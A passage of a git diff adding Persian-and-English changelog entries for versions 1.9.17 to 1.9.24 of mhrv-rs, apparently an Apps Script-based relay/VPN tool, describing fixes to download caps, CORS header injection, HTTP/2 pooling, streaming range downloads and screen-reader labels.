+• Fix Full mode large-download truncation at exactly 50 MiB ([#863](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/863)). Apps Script's response body cap is ~50 MiB; tunnel-node had a `TCP_DRAIN_MAX_BYTES = 16 MiB` per-session cap to stay under it, but **multiple sessions in the same batch** each contributed up to 16 MiB raw, summing past 50 MiB on busy VPS (Steam/CDN downloads with N≥4 concurrent sessions). Symptom: `batch JSON parse error: EOF while parsing a string at line 1 column 52428630 (body_len=52428630)` followed by session abort + download restart from 0. Fix: new `BATCH_RESPONSE_BUDGET = 32 MiB` total-batch cap; the drain loop tracks remaining budget across sessions and stops one short of the cliff. Sessions deferred this batch keep their buffered data and drain on the next poll (no data loss). New regression test `drain_now_respects_caller_budget_below_per_session_cap`. ۳۶ tunnel-node test (was 35) همه pass + ۱۹۷ lib test همه pass.
+---
+• Fix Full mode large-download truncation at exactly 50 MiB ([#863](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/863)). Apps Script's response body cap is ~50 MiB; tunnel-node had a `TCP_DRAIN_MAX_BYTES = 16 MiB` per-session cap to stay under it, but **multiple sessions in the same batch** each contributed up to 16 MiB raw, summing past 50 MiB on busy VPS (Steam / CDN downloads with N≥4 concurrent sessions). Symptom: `batch JSON parse error: EOF while parsing a string at line 1 column 52428630 (body_len=52428630)` followed by session abort + download restart from 0. Fix: new `BATCH_RESPONSE_BUDGET = 32 MiB` total-batch cap; the drain loop tracks remaining budget across sessions and stops one short of the cliff. Sessions deferred this batch keep their buffered data and drain on the next poll (no data loss). New regression test `drain_now_respects_caller_budget_below_per_session_cap`. **36 tunnel-node tests** (was 35) + **197 lib tests** all green.
diff --git a/docs/changelog/v1.9.17.md b/docs/changelog/v1.9.17.md
new file mode 100644
index 00000000..1c80361d
--- /dev/null
+++ b/docs/changelog/v1.9.17.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Inject CORS response headers after relay — اضافه شد به‌جای فقط preflight short-circuit. مرورگرها در درخواست‌های cross-origin (مثل YouTube’s `youtubei/v1/next` / `youtubei/v1/comments` که از script context fire می‌شه) responseـی نیاز دارن با `Access-Control-Allow-Origin` که با origin درخواست match کنه + `Allow-Credentials: true`. Apps Script's `UrlFetchApp.fetch()` گاهی header‌های ACL مقصد رو preserve نمی‌کنه، یا destination با `Allow-Origin: *` پاسخ می‌ده که با credentialed request ناسازگاره. mhrv-rs حالا header‌های `Access-Control-*` پاسخ relay رو strip می‌کنه + permissive set تزریق می‌کنه که با origin درخواست echo می‌شه. **علت ریشه‌ای**: YouTube comments نمی‌اومدن load بشن + گاهی restricted-mode error به همین دلیل ظاهر می‌شد. ایده credit: ThisIsDara/mhr-cfw-go (Go rewrite of upstream Python). فقط برای درخواست‌هایی با Origin header اعمال می‌شه — non-CORS traffic (curl، apps native) دست‌نخورده می‌مونه. ۱۹۷ → **۲۰۰ lib test** (+۳ regression test for CORS injection edge cases).
+---
+• Inject CORS response headers after relay (in addition to the existing preflight short-circuit). When browsers issue cross-origin fetches from script contexts — e.g. YouTube's `youtubei/v1/next` / `youtubei/v1/comments` calls, which fire from the player JS — they require the response to carry `Access-Control-Allow-Origin` matching the request's origin AND `Allow-Credentials: true`. Apps Script's `UrlFetchApp.fetch()` sometimes doesn't preserve the destination's ACL headers, or the destination returns `Allow-Origin: *` which is incompatible with credentialed requests. mhrv-rs now strips any `Access-Control-*` headers from the relay response and injects a permissive set keyed on the request's `Origin`. **Root cause**: YouTube comments not loading + the "restricted mode" error sometimes surfacing on cross-origin XHR responses the browser silently dropped. Idea credit: ThisIsDara/mhr-cfw-go (Go rewrite of upstream Python's CFW variant). Only applies when the original request had an `Origin` header — non-CORS traffic (curl, app-level HTTP clients) passes through byte-for-byte unchanged. 197 → **200 lib tests** (+3 regression tests for CORS injection edge cases: wildcard-origin replacement, non-ACL header preservation, malformed-response passthrough).
diff --git a/docs/changelog/v1.9.18.md b/docs/changelog/v1.9.18.md
new file mode 100644
index 00000000..8b6814f0
--- /dev/null
+++ b/docs/changelog/v1.9.18.md
@@ -0,0 +1,18 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• Performance refactor of full-tunnel mux hot path ([#881](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/881) by @dazzling-no-more) — zero-copy reads via `Bytes`/`BytesMut` و base64 encoding از روی single mux thread برداشته شد. هیچ wire-protocol change نداره — فقط internal data flow. (1) `tunnel_loop` و SOCKS5 UDP receive loop دیگه per-iteration `Vec::to_vec()` copy ندارن. `MuxMsg::{ConnectData,Data,UdpOpen,UdpData}` حالا `Bytes` (Arc-backed) carry می‌کنن به جای `Vec<u8>`/`Arc<Vec<u8>>`. TCP path threshold-based: ≥32 KB → `BytesMut::split().freeze()` (saves 64 KB memcpy on hot downloads); <32 KB → `Bytes::copy_from_slice` + `buf.clear()` (payload-sized retention). UDP path: fixed `Vec<u8>` recv buffer + size-guarded copy. (2) base64 encoding (تا ~3 MB per batch) از mux thread رفت به spawned task تو `fire_batch` بعد از per-deployment semaphore — single mux task دیگه serialize نمی‌شه. (3) Code quality: `BatchAccum::push_or_fire` (۴ match arm به ۱ کلپس)، `should_fire()` predicate با `saturating_add`، `encode_pending()` free function. ۲۰۰ → **۲۰۸ lib test** (+۸ regression: encode_pending × ۴، should_fire × ۳، batch_accum_reindexes_after_flush). API change: `TunnelMux::udp_open`/`udp_data` حالا `impl Into<Bytes>` می‌گیرن — existing callers با Vec<u8>/Bytes/BytesMut بدون تغییر کار می‌کنن.
+---
+• Performance refactor of the full-tunnel mux hot data path ([#881](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/881) by @dazzling-no-more). No wire-protocol changes — internal data flow only.
+
+**1. Zero-copy reads via `Bytes`/`BytesMut`.** `tunnel_loop` and the SOCKS5 UDP receive loop drop per-iteration `Vec::to_vec()` copies. `MuxMsg::{ConnectData,Data,UdpOpen,UdpData}` now carry `Bytes` (Arc-backed internally) instead of `Vec<u8>`/`Arc<Vec<u8>>`; the `Arc::try_unwrap` dance for `pending_client_data` is gone. TCP path is threshold-based to avoid memory regressions:
+- **n ≥ 32 KB**: `BytesMut::split().freeze()` — saves the 64 KB memcpy on hot downloads.
+- **n < 32 KB**: `Bytes::copy_from_slice` + `buf.clear()` — payload-sized retention. Without this split, `bytes` 1.x's whole-allocation refcount would pin a full 64 KB per queued tiny read under semaphore stall (worst case ~96 MB on a backpressured tunnel).
+
+UDP path: fixed `Vec<u8>` recv buffer + `Bytes::copy_from_slice` after the 9 KB `MAX_UDP_PAYLOAD_BYTES` guard. `parse_socks5_udp_packet` split into `_offsets` + `&[u8]` wrapper so callers stay on the reusable buffer.
+
+**2. Base64 encoding moved off the single mux thread.** New internal `PendingOp { data: Option<Bytes>, encode_empty: bool }` flows through `mux_loop` with raw bytes. Actual `B64.encode(...)` runs in `fire_batch`'s spawned task, after the per-deployment semaphore. Up to ~3 MB of encoding per batch (50 ops × 64 KB) no longer serializes the single mux task.
+
+**3. Code quality (drive-bys).** `BatchAccum::push_or_fire` collapses 4× ~25-line match arms into ~10 lines each. `should_fire(pending_len, payload_bytes, op_bytes)` predicate extracted with `saturating_add`. `encode_pending(p) -> BatchOp` extracted as a free function for direct test coverage.
+
+**Public API change**: `TunnelMux::udp_open` and `udp_data` now take `data: impl Into<Bytes>` instead of `Vec<u8>` — existing in-tree callers passing `Vec<u8>`, `&'static [u8]`, `Bytes`, or `BytesMut` all keep compiling.
+
+200 → **208 lib tests** (+8 regression: `encode_pending_*` × 4, `should_fire_*` × 3, `batch_accum_reindexes_after_flush`).
diff --git a/docs/changelog/v1.9.19.md b/docs/changelog/v1.9.19.md
new file mode 100644
index 00000000..2d011ecf
--- /dev/null
+++ b/docs/changelog/v1.9.19.md
@@ -0,0 +1,10 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• UI accessibility — screen reader labels for NVDA / Narrator ([#1015](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1015) by @brightening-eyes, fixes [#916](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/916)). `accesskit` در Cargo.toml از قبل فعال بود ولی هیچ widget label-association نداشت — وقتی focus به یک text input یا combobox می‌رفت، NVDA فقط نوع control رو می‌گفت ("edit", "combobox") نه نام field رو. حالا `form_row` پلامبینگ `egui::Id` رو به widget می‌فرسته و هر widget با `.labelled_by(label_id)` به label visible خود معرفی می‌شه. تست شد توسط کاربر نابینایی که issue رو گزارش داد. ۲۰۸ lib test همه pass. (also includes [c437598](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/commit/c437598) fix for exit_node Content-Encoding + Content-Length stripping — ChatGPT / Claude / Reddit through exit-node now work without Content Encoding Error.)
+---
+• **UI accessibility — proper screen-reader labels for NVDA / Narrator** ([#1015](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1015) by @brightening-eyes, fixes [#916](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/916)). The `accesskit` feature was already enabled in `Cargo.toml` via eframe, but no widget had an explicit label association — so when focus moved to a text input or combobox, NVDA / Narrator only announced the control type ("edit", "combobox") instead of the field name. The fix plumbs `egui::Id` through `form_row` so each widget can call `.labelled_by(label_id)` to associate with its visible label. Tested by the blind user who originally reported the issue with their actual NVDA setup. 208/208 lib tests still pass.
+
+`form_row`'s signature changes from `widget: impl FnOnce(&mut egui::Ui)` to `widget: impl FnOnce(&mut egui::Ui, egui::Id)`. Two existing call sites that don't need the label id (the `Mode` combobox, `Share on LAN` checkbox) bind it as `_label_id` — no functional change there.
+
+• Also rolling up the [exit_node Content-Encoding fix](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/commit/c437598) (#964): `fetch()` (Deno / Bun / Node) auto-decompresses gzip / br / deflate response bodies, but the destination's `Content-Encoding: gzip` header was forwarded verbatim — telling the browser the body was gzipped when it was already plain. Browsers raised `Content Encoding Error: invalid or unsupported form of compression`. Strip both `Content-Encoding` and `Content-Length` from the forwarded headers (the Apps Script + Rust transport reframes the wire body anyway, so neither is meaningful end-to-end). Affects every compressed-response destination through exit-node: ChatGPT, Claude, Reddit, X, etc.
+
+**Action for exit-node users**: pull the latest [`assets/exit_node/exit_node.ts`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/blob/main/assets/exit_node/exit_node.ts) and redeploy your Deno Deploy / VPS exit-node. The Rust binary side has nothing new for this fix — it's purely on the exit-node script.
diff --git a/docs/changelog/v1.9.2.md b/docs/changelog/v1.9.2.md
new file mode 100644
index 00000000..7fe74aba
--- /dev/null
+++ b/docs/changelog/v1.9.2.md
@@ -0,0 +1,4 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• backend جایگزین Apps Script + Cloudflare Worker (PR [#533](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/533) از @dazzling-no-more): deploy `Code.cfw.gs` (variant جدید GAS در `assets/apps_script/`) + `worker.js` (Cloudflare Worker در `assets/cloudflare/`)، Apps Script یک layer thin auth+forward می‌شه که outbound fetch رو به CF edge می‌ده. mhrv-rs خود **بدون تغییر** — همان envelope JSON روی wire، همان `mode: "apps_script"`، `script_id`، `auth_key`. تنها تفاوت چیزی هست که Apps Script deployed بعد از authentication انجام می‌ده. این task audit در roadmap [#380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380) / [#393](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/393) رو close می‌کنه. **چرا** کاربران Persian گزارش دادن GAS+CFW combination از pure GAS برای browsing + chat-style سریع‌تر حس می‌شه. **سختگیر شده over upstream [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw)**: per-request AUTH_KEY check (upstream omit می‌کرد → relay open اگر URL leak شد)، fail-closed اگر AUTH_KEY هنوز placeholder باشه، loop guard `x-relay-hop` + self-host fetch block، body drop on GET/HEAD برای match با Code.gs/UrlFetchApp permissiveness، SKIP_HEADERS parity، batch handler با `Promise.all` + soft cap `MAX_BATCH_SIZE = 40`. **محدودیت‌های صادقانه** (در docs explicit): با `mode: "full"` ناسازگار است (فقط HTTP-relay path port شده، نه raw-TCP/UDP tunnel ops). YouTube long-form بدتر می‌شه (30s CF Worker wall vs Apps Script ~6min — SABR cliff زودتر می‌رسه). Cloudflare anti-bot اثر معکوس داره (Worker IP اغلب stricter از Google IP). Day-one quota relief نیست (path batch ready ولی از client شیپ شده single-shape unreachable). **docs کامل** انگلیسی + فارسی در `assets/cloudflare/README.md` + `README.fa.md` شامل setup، model security سه AUTH_KEY match، trade-off table، Full mode incompatibility.
+---
+• Apps Script + Cloudflare Worker alternative backend (PR [#533](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/533) by @dazzling-no-more): deploy `Code.cfw.gs` (new GAS variant in `assets/apps_script/`) plus `worker.js` (Cloudflare Worker in `assets/cloudflare/`), and Apps Script becomes a thin auth+forward layer that pushes the outbound fetch to CF's edge. mhrv-rs itself is **unchanged** — same JSON envelope on the wire, same `mode: "apps_script"`, `script_id`, `auth_key`. The only difference is what the deployed Apps Script does after it authenticates. Closes the audit task on the v1.9.x roadmap ([#380](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/380), [#393](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/393)). **Why**: recurring Persian-community feedback reports that GAS+CFW combination feels noticeably faster than plain GAS for browsing and chat-style workloads. **Hardened over upstream [denuitt1/mhr-cfw](https://github.com/denuitt1/mhr-cfw)**: per-request `AUTH_KEY` check (upstream omitted → open relay if URL leaks), fail-closed if `AUTH_KEY` still equals the placeholder, `x-relay-hop` loop guard + self-host fetch block, drops body on GET/HEAD to match `Code.gs`/UrlFetchApp permissiveness, SKIP_HEADERS parity, batch handler with `Promise.all` + soft cap `MAX_BATCH_SIZE = 40`. **Honest limitations called out in docs**: not compatible with `mode: "full"` (only HTTP-relay path ported; raw-TCP / UDP tunnel ops needed for messengers under Android full-mode aren't). YouTube long-form gets worse (30 s CF Worker wall vs Apps Script's ~6 min — SABR cliff arrives sooner). Cloudflare anti-bot is unaffected — exit IP becomes a Workers IP, which CF's anti-bot fingerprints as worker-internal (often stricter than a Google IP). No day-one `UrlFetchApp` daily-count relief; the batch-aware GAS+Worker path is wired and ready (`ceil(N / 40)` per N-URL batch) but unreachable from any shipping client today (mhrv-rs's HTTP-relay path is single-shape only). **Full docs** in English + Persian at `assets/cloudflare/README.md` + `README.fa.md` covering setup, the three-matching-`AUTH_KEY`s security model, trade-off table, full-mode incompatibility section. README updated with alternative-backend callout in both languages.
diff --git a/docs/changelog/v1.9.20.md b/docs/changelog/v1.9.20.md
new file mode 100644
index 00000000..57092af7
--- /dev/null
+++ b/docs/changelog/v1.9.20.md
@@ -0,0 +1,23 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **Fix Full mode regression از v1.9.15** ([#924](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/924) — یک ۳-هفته‌ای tracking thread با ۱۸+ duplicate report، fixed by [@rezaisrad](https://github.com/rezaisrad) in [PR #1029](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1029)). علامت: `batch timed out after 30s` در Full mode، در حالی که apps_script mode normal کار می‌کرد. فقط workaround موجود `"force_http1": true` kill switch بود. Bisect دقیق این رو به [`0e678630a`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/commit/0e678630a) (PR #799 که h2 multiplexing رو اضافه کرد) رساند. روت کاز یک‌ line ordering: `warm()` در v1.9.15 h1 prewarm loop رو پشت `ensure_h2().await` گذاشت — وقتی h2 handshake کند بود (تا 8s)، pool h1 خالی می‌موند. اگر در آن window یک request می‌آمد، h1 fallback یک TCP+TLS handshake cold می‌زد که خود stall می‌شد، outside the 30s batch_timeout. Fix: h1 prewarm parallel با h2 handshake (v1.9.14 ordering restored)، plus بستنک‌های پیرامون با `H1_OPEN_TIMEOUT_SECS = 8` و `H2Cell.dead` AtomicBool. ۲۰۸ → **۲۰۹ lib test** (+1 regression: `ensure_h2_rejects_dead_cell_within_ttl`). تأیید end-to-end: 5/5 cold restarts pass (9.6-22.5s)، 5/5 concurrent SOCKS5 burst.
+---
+• **Fix Full mode regression since v1.9.15** ([#924](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/924), [PR #1029](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1029) by @rezaisrad). #924 was the canonical tracking thread for an 18+ duplicate cluster spanning ~3 weeks; affected users saw `batch timed out after 30s` on every Full-mode request while apps_script mode kept working. The only available workaround was the `"force_http1": true` kill switch.
+
+**Root cause** (rigorously bisected to [`0e678630a`](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/commit/0e678630a) — PR #799 which added HTTP/2 multiplexing): PR #799 gated the h1 socket-pool prewarm behind `ensure_h2().await`. `ensure_h2()` is bounded by `H2_OPEN_TIMEOUT_SECS = 8s` but can take the full window on a cold first connection. During that window the h1 fallback pool was empty, so any request that arrived would:
+
+1. Get `Err((Relay("h2 unavailable"), No))` immediately → fall back to h1
+2. Empty pool → cold `open()` → fresh TCP+TLS to `connect_host:443`
+3. Same network conditions that stalled h2 also stalled h1; cold open exceeded the 30s `batch_timeout`
+4. User saw `batch timed out after 30s` — a failure that the "it works on apps_script" observation couldn't explain
+
+**Fix** (two commits, `domain_fronter.rs`-only):
+
+1. **`warm h1 pool in parallel with h2`**: spawn h2 prewarm in a separate task so the h1 prewarm loop runs concurrently. Full `n` h1 sockets are warm before user traffic, even when h2 stalls. `run_pool_refill` trims back to `POOL_MIN_H2_FALLBACK = 2` within 5s once h2 lands as the fast path.
+
+2. **`bound h1 open() + detect dead h2 cells synchronously`**: `H1_OPEN_TIMEOUT_SECS = 8` wraps the TCP+TLS handshake in `open()` so a stuck handshake doesn't block `acquire()` until the outer batch budget elapses. `H2Cell.dead: Arc<AtomicBool>` flipped by the connection driver task when `Connection::await` ends — known-dead cells are rejected within ≤5s instead of waiting for `H2_CONN_TTL_SECS = 540s` to expire.
+
+**API impact**: `h2_handshake_post_tls` return type changes to `(SendRequest, Arc<AtomicBool>)`. One existing test (`h2_handshake_post_tls_returns_alpn_refused_when_peer_picks_h1`) tweaks its `Ok` arm to match — no panic message change.
+
+208 → **209 lib tests** (+1 regression: `ensure_h2_rejects_dead_cell_within_ttl`). Live end-to-end (per PR notes): 5/5 cold restarts pass in 9.6-22.5s, 5/5 concurrent SOCKS5 burst, default full.json baseline 200 OK in 13.3s.
+
+**Action for affected users**: update to v1.9.20, drop the `"force_http1": true` workaround from `config.json` if you had it set. Full mode should work reliably on cold restart again.
diff --git a/docs/changelog/v1.9.21.md b/docs/changelog/v1.9.21.md
new file mode 100644
index 00000000..472053ff
--- /dev/null
+++ b/docs/changelog/v1.9.21.md
@@ -0,0 +1,31 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **Perf: skip H2 برای Full-tunnel batch requests** ([PR #1040](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1040) by @yyoyoian-pixel). Full mode tunnel batches قبلاً N op رو در یک HTTP request coalesce می‌کنند — H2 stream multiplexing چیزی برای multiplex کردن نداره. H2 try/fallback path در این مسیر خاص سه regression از v1.9.14 معرفی کرد: (1) long-poll stallها در ۱۶-۱۷s به جای 10s timeout روی H1 — هر poll ~۶۰٪ بیشتر slot Apps Script رو نگه می‌داشت، (2) silent batch drops via `RequestSent::Maybe` بدون retry، (3) pool starvation از `POOL_MIN_H2_FALLBACK = 2` که از 8 → 2 trim می‌کرد. H2 multiplexing برای **relay mode** (apps_script) فعال می‌مونه — اونجا واقعاً به‌درد می‌خوره (r0ar در #962 confirmed). A/B روی Pixel 6 Pro: **0/30 vs 8-10/30** long-poll stalls. ۲۰۹ lib test still pass. v1.9.14 tunnel performance بازگشت + همه v1.9.15+ improvements حفظ شد (relay mode h2، zero-copy mux، block DoH/QUIC، PR #1029 warm-race fix).
+---
+• **Perf: skip H2 for Full-tunnel batch requests** ([PR #1040](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1040) by @yyoyoian-pixel). Tunnel batches already coalesce N ops into one HTTP request — H2 stream multiplexing has nothing to multiplex on this code path. The H2 try/fallback block introduced three regressions vs v1.9.14:
+
+1. **Long-poll stalls**: idle polls completed at 16-17s (`LONGPOLL_DEADLINE` + network latency) instead of timing out at 10s on H1. Each poll held an Apps Script execution slot ~60% longer.
+2. **Silent batch drops**: `RequestSent::Maybe` failures dropped the entire batch with no retry — a failure mode H1 doesn't have.
+3. **Pool starvation**: `POOL_MIN_H2_FALLBACK = 2` trimmed the H1 pool from 8 → 2 once H2 connected, but tunnel batches still used H1 and needed the full pool.
+
+H2 multiplexing **stays active for relay mode** (non-full) where each browser request is a separate HTTP call that genuinely benefits from stream multiplexing — r0ar's controlled A/B test in #962 confirmed h2 is strictly better than `force_http1: true` for apps_script-mode users, and that path is unchanged here.
+
+## Changes (`domain_fronter.rs`-only, +12/-54 lines, -42 net)
+
+- `tunnel_batch_request_to`: remove H2 try/fallback/NonRetryable block, go straight to H1 pool `acquire()`.
+- `run_pool_refill`: always maintain `POOL_MIN = 8`. Remove the `POOL_MIN_H2_FALLBACK = 2` trim.
+
+## A/B results (Pixel 6 Pro, 30 batch samples each)
+
+| Metric | H2 (stock v1.9.20) | H1 (this release) | v1.9.14 (baseline) |
+|---|---|---|---|
+| 16-17s batches | **8-10/30** | **0/30** | **0/30** |
+| 10s timeouts | 0 | 4/30 | 5/30 |
+| Active RTTs | 1.4-2.4s | 1.3-2.2s | 1.4-2.3s |
+
+Restores v1.9.14 tunnel performance while keeping all v1.9.15+ improvements (H2 for relay, zero-copy mux from PR #881, block DoH/QUIC defaults from v1.9.13/14, PR #1029's warm-race fix from v1.9.20).
+
+## Interaction with v1.9.20 (PR #1029)
+
+PR #1029 added `H2Cell.dead: Arc<AtomicBool>` for synchronous dead-cell detection. With this release removing the H2 path for tunnel batches, the dead-cell flag scopes to relay mode only — that's intentional (the flag was protecting the relay path in practice). No regression.
+
+209 lib tests still pass (no test changes — the affected paths are exercised by integration probes which the PR reporter ran on Pixel 6 Pro).
diff --git a/docs/changelog/v1.9.22.md b/docs/changelog/v1.9.22.md
new file mode 100644
index 00000000..89ab780a
--- /dev/null
+++ b/docs/changelog/v1.9.22.md
@@ -0,0 +1,20 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **Fix: skip H2 برای `tunnel_request` (single ops) — completes [#1040](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1040)** ([PR #1041](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1041) by @yyoyoian-pixel). v1.9.21's PR #1040 H2 رو از `tunnel_batch_request_to` skip کرد ولی `tunnel_request` (single-op path برای plain `connect` ops) جا موند. کاربرانی که session‌های full-tunnel با single-op path داشتند هنوز ۱۶-۱۷s long-poll stalls می‌گرفتن. این PR fix رو complete می‌کنه — same shape: حذف H2 try/fallback/NonRetryable block، مستقیم H1 pool `acquire()`. همه ۵ تا call site `h2_relay_request` audit شدن (جدول در PR description) — relay-mode paths H2 رو نگه می‌دارن (apps_script users بدون change)، همه full-tunnel paths حالا H1-only. ۲۰۹ lib test still pass.
+---
+• **Fix: skip H2 for `tunnel_request` (single ops) — completes [#1040](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1040)** ([PR #1041](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1041) by @yyoyoian-pixel).
+
+v1.9.21's PR #1040 skipped H2 for `tunnel_batch_request_to` but missed `tunnel_request` — the single-op path used for plain `connect` ops. Users on full-tunnel sessions that went through the single-op path still saw 16-17s long-poll stalls. This PR completes the fix: same shape, remove the H2 try/fallback/NonRetryable block from `tunnel_request`, go straight to H1 pool `acquire()`.
+
+All 5 `h2_relay_request` call sites audited:
+
+| Call site | Function | Mode | H2 skipped? |
+|---|---|---|---|
+| `do_relay_once_with` | relay | Relay | No (correct — relay benefits from H2) |
+| `relay()` exit-node | relay | Relay | No (correct) |
+| `tunnel_request` | tunnel single op | Full tunnel | **Yes (this release)** |
+| `tunnel_batch_request_to` | tunnel batch | Full tunnel | Yes (v1.9.21) |
+| `tunnel_batch_request_with_timeout` | tunnel batch | Full tunnel | Yes (v1.9.21) |
+
+No other full-tunnel paths use H2 after this fix. Relay-mode H2 stays — r0ar's controlled A/B in #962 confirmed h2 is strictly better for apps_script-mode users, and that path is unchanged.
+
+209 lib tests still pass. `domain_fronter.rs`-only, -41 net lines.
diff --git a/docs/changelog/v1.9.23.md b/docs/changelog/v1.9.23.md
new file mode 100644
index 00000000..f1929499
--- /dev/null
+++ b/docs/changelog/v1.9.23.md
@@ -0,0 +1,25 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
+• **Fix: stream range-parallel downloads larger than Apps Script's 50 MiB cap** ([#1042](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1042) + [PR #1085](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1085) by @dazzling-no-more). دانلودهای range-capable بزرگ‌تر از ~۵۰ MiB از طریق Apps Script relay با \`504 Relay timeout — Apps Script unresponsive\` fail می‌شد. v2rayN DMG 104 MiB در reported logs canonical repro بود. روت کاز: \`relay_parallel_range\` در 64 MiB ceiling داشت و برای بالاتر به single \`relay()\` fallback می‌کرد که از 50 MiB Apps Script ceiling عبور می‌کرد، Apps Script script رو mid-execution می‌کشت، و 25s timeout. Fix: \`relay_parallel_range\` به writer-based API تبدیل شد که large files رو chunk-by-chunk (هر chunk ≤256 KiB، خوب زیر 50 MiB cap) به client socket stream می‌کنه. ۴-way dispatch: Buffered (≤40 MiB)، Stream (40 MiB-16 GiB)، FallbackSingleGet (wrapper 40-64 MiB)، RejectTooLarge (>16 GiB، quota guard). Lazy range planning با \`saturating_*\` — O(1) memory حتی برای \`u64::MAX\` total (قبل ~6 GB Vec allocation می‌داد). MITM HTTPS + plain HTTP call sites + CORS-aware \`transform_head\` همه updated. ۲۰۹ → **۲۲۷ lib test** (+۱۸ new: dispatch enum، lazy planning، head assembly، head transform، streaming writer، flush behavior، CORS-into-streaming integration).
+---
+• **Fix: stream range-parallel downloads larger than Apps Script's 50 MiB cap** ([#1042](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/issues/1042) + [PR #1085](https://github.com/therealaleph/MasterHttpRelayVPN-RUST/pull/1085) by @dazzling-no-more).
+
+Range-capable downloads larger than ~50 MiB through the Apps Script relay returned `504 Relay timeout — Apps Script unresponsive` instead of the file. The 104 MiB v2rayN DMG in the reported logs was the canonical repro (also fixes @Paymanonline's #1077 report).
+
+**Root cause**: `relay_parallel_range` capped the stitched response at 64 MiB and fell back to a single `relay()` for anything larger. Single-GET routes through Apps Script's ~50 MiB response ceiling, so Apps Script killed the script mid-execution and we hung for the full 25s relay timeout before returning 504.
+
+**Fix**: convert `relay_parallel_range` into a writer-based API that streams large files chunk-by-chunk to the client socket. Each chunk is still one ≤256 KiB Apps Script call (well under the 50 MiB cap); only the host-side buffering changes. Backward-compatible `Vec<u8>` wrapper preserves the pre-v1.9.23 API surface for external library consumers.
+
+Four-way dispatch via `RangeDispatch { Buffered, Stream, FallbackSingleGet, RejectTooLarge }` and the pure `dispatch_range_response(total, streaming_allowed)` predicate:
+
+- **`Buffered`** — `total ≤ APPS_SCRIPT_BODY_MAX_BYTES` (40 MiB) on either surface. Existing stitch + single-GET fallback path; fully recovers on chunk failure.
+- **`Stream`** — writer API above 40 MiB. Streams; chunk failure flushes the committed prefix and returns `Err` so the `Content-Length` mismatch tells download clients to resume via `Range`.
+- **`FallbackSingleGet`** — wrapper above 64 MiB. Falls back to `self.relay()`, matching the pre-v1.9.23 cliff for external library consumers stuck on the old API.
+- **`RejectTooLarge`** — writer API above 16 GiB. Refuses with 502; bounds worst-case Apps Script quota drain from a hostile origin advertising an absurd `Content-Range` total.
+
+**Memory bounds**: Lazy `plan_remaining_ranges` via `std::iter::from_fn` + `saturating_*`. Range planning is `O(1)` memory regardless of advertised total — even a `u64::MAX` total no longer drives a ~6 GB `Vec<(u64, u64)>` allocation.
+
+**CORS interaction**: MITM HTTPS and plain-HTTP call sites updated to use `relay_parallel_range_to` with a CORS-aware `transform_head` closure. New `inject_cors_into_head` (head-only variant of `inject_cors_response_headers`) lets the streaming path rewrite ACL headers before the body has been assembled.
+
+209 → **227 lib tests** (+18 new: `RangeDispatch` enum coverage, lazy range planning under `u64::MAX`, `assemble_200_head` correctness, `transform_head` closure invocation, streaming writer chunk-by-chunk semantics, head-then-flush-before-body ordering, CORS-into-streaming cross-module integration).
+
+**User impact**: GitHub release downloads, large CDN binaries, ROM-hack distributions, anything in the 50 MiB – 16 GiB range now downloads successfully through apps_script mode. Previously these required Full mode, an Iran-mirror proxy (#1077), or a friend-with-VPS workaround.
diff --git a/docs/changelog/v1.9.24.md b/docs/changelog/v1.9.24.md
new file mode 100644
index 00000000..6a4a8c47
--- /dev/null
+++ b/docs/changelog/v1.9.24.md
@@ -0,0 +1,25 @@
+<!-- see docs/changelog/v1.1.0.md for the file format: Persian, then `---`, then English. -->
